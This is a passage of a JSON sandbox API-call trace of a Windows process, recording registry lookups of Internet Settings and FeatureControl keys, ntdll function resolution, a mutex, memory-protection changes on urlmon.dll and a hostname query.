"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize" } ], "repeated": 0, "id": 783 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000300" }, { "name": "ValueName", "value": "CreateUriCacheSize" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize" } ], "repeated": 0, "id": 784 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002fc" }, { "name": "ValueName", "value": "EnablePunycode" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode" } ], "repeated": 0, "id": 785 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002e0" }, { "name": "ValueName", "value": "EnablePunycode" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode" } ], "repeated": 0, "id": 786 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x0000027c" }, { "name": "ValueName", "value": "EnablePunycode" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode" } ], "repeated": 0, "id": 787 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000300" }, { "name": "ValueName", "value": "EnablePunycode" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode" } ], "repeated": 0, "id": 788 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002e8" }, { "name": "ObjectAttributesName", "value": "FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562" } ], "repeated": 0, "id": 789 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002e4" }, { "name": "ObjectAttributesName", "value": "FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562" } ], "repeated": 0, "id": 790 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764e0bbf", "parentcaller": "0x72a5ea95", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 791 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f956a", "parentcaller": "0x72a68097", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlRegisterFeatureConfigurationChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77182560" } ], "repeated": 0, "id": 792 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f956a", "parentcaller": "0x72a67dad", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtQueryWnfStateData" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c4820" } ], "repeated": 0, "id": 793 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f956a", "parentcaller": "0x72a680fd", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlSubscribeWnfStateChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77180780" } ], "repeated": 0, "id": 794 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f956a", "parentcaller": "0x72a5aa1d", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDisownModuleHeapAllocation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771bc9f0" } ], "repeated": 0, "id": 795 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f956a", "parentcaller": "0x72a68030", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlQueryFeatureConfiguration" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771b5a30" } ], "repeated": 0, "id": 796 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f956a", "parentcaller": "0x72a521c3", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771afa60" } ], "repeated": 0, "id": 797 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764e15a7", "parentcaller": "0x72a5ad43", "category": "synchronization", "api": "NtCreateMutant", "status": true, "return": "0x40000000", "arguments": [ { "name": "Handle", "value": "0x00000440" }, { "name": "MutexName", "value": "Local\\SM0:3552:168:WilStaging_02" }, { "name": "InitialOwner", "value": "0" } ], "repeated": 0, "id": 798 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x72a5afaf", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000440" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 799 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 800 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000444" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 801 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x72a5aef6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000444" } ], "repeated": 0, "id": 802 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764de6a0", "parentcaller": "0x72a5af8e", "category": "synchronization", "api": "NtReleaseMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000440" } ], "repeated": 1, "id": 803 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002e8" }, { "name": "ObjectAttributesName", "value": "FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION" } ], "repeated": 0, "id": 804 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002e4" }, { "name": "ObjectAttributesName", "value": "FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION" } ], "repeated": 0, "id": 805 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00745000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 806 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002e8" }, { "name": "ObjectAttributesName", "value": "FEATURE_URI_DISABLECACHE" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_URI_DISABLECACHE" } ], "repeated": 0, "id": 807 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002e4" }, { "name": "ObjectAttributesName", "value": "FEATURE_URI_DISABLECACHE" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_URI_DISABLECACHE" } ], "repeated": 0, "id": 808 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000002f4" }, { "name": "ObjectAttributesName", "value": "Microsoft\\Internet Explorer\\Security" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Security" } ], "repeated": 0, "id": 809 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "ValueName", "value": "DisableSecuritySettingsCheck" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Security\\DisableSecuritySettingsCheck" } ], "repeated": 0, "id": 810 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x72a559f4", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000444" } ], "repeated": 0, "id": 811 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000002f8" }, { "name": "ObjectAttributesName", "value": "Microsoft\\Internet Explorer\\Security" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Security" } ], "repeated": 0, "id": 812 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "ValueName", "value": "DisableSecuritySettingsCheck" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Security\\DisableSecuritySettingsCheck" } ], "repeated": 0, "id": 813 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x72a559f4", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000444" } ], "repeated": 0, "id": 814 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x74a08afd", "parentcaller": "0x74a0deb5", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "0", "pretty_value": "ThreadBasicInformation" }, { "name": "ThreadInformation", "value": "\\x03\\x01\\x00\\x00\\x00\\xd03\\x00\\xe0\r\\x00\\x00\\x1c+\\x00\\x00\\x03\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "11036" } ], "repeated": 0, "id": 815 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x771a016f", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72838000" }, { "name": "ModuleName", "value": "urlmon.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 816 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72838000" }, { "name": "ModuleName", "value": "urlmon.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 817 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x771a016f", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72838000" }, { "name": "ModuleName", "value": "urlmon.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 818 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72838000" }, { "name": "ModuleName", "value": "urlmon.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 819 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7650cb52", "parentcaller": "0x7650ca56", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" } ], "repeated": 0, "id": 820 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7650cb97", "parentcaller": "0x7650ca56", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "ValueName", "value": "Hostname" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "DESKTOP-JQK72EN" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname" } ], "repeated": 0, "id": 821 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7650cbfc", "parentcaller": "0x7650ca56", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000444" } ], "repeated": 0, "id": 822 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7650cb52", "parentcaller": "0x7650ca56", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" } ], "repeated": 0, "id": 823 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7650cb97", "parentcaller": "0x7650ca56", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "ValueName", "value": "Hostname" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "DESKTOP-JQK72EN" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname" } ], "repeated": 0, "id": 824 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7650cbfc", "parentcaller": "0x7650ca56", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000444" } ], "repeated": 0, "id": 825 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000003c4" }, { "name": "ObjectAttributesName", "value": "Domains\\" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\" } ], "repeated": 0, "id": 826 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764ccdd3", "parentcaller": "0x765363aa", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "KeyInformation", "value": "\\xffc7}\r\\x00H}\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x0e\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "4" } ], "repeated": 0, "id": 827 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000444" } ], "repeated": 0, "id": 828 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 829 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\" } ], "repeated": 0, "id": 830 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003c4" }, { "name": "ValueName", "value": "AutoDetect" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "0" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect" } ], "repeated": 0, "id": 831 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003c4" }, { "name": "ValueName", "value": "IntranetName" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName" } ], "repeated": 0, "id": 832 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003c4" }, { "name": "ValueName", "value": "ProxyBypass" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" } ], "repeated": 0, "id": 833 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x72dbd5c6", "parentcaller": "0x7272584b", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 834 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x72dbd42e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000444" } ], "repeated": 0, "id": 835 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000003c4" }, { "name": "ObjectAttributesName", "value": "ProtocolDefaults\\" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults\\" } ], "repeated": 0, "id": 836 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": "11036", "caller": "0x764ccdd3", "parentcaller": "0x765363aa", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000444" }, { "name": "KeyInformation", "value": "\\xffc7}\r\\x00H}\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x16\\x00\\x00\\x00\\x04\\x00\\x00\\x00 \\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "4" } ], "repeated": 0, "id": 837 }, { "timestamp": "2025-02-27 23:34:22,628", "thread_id": 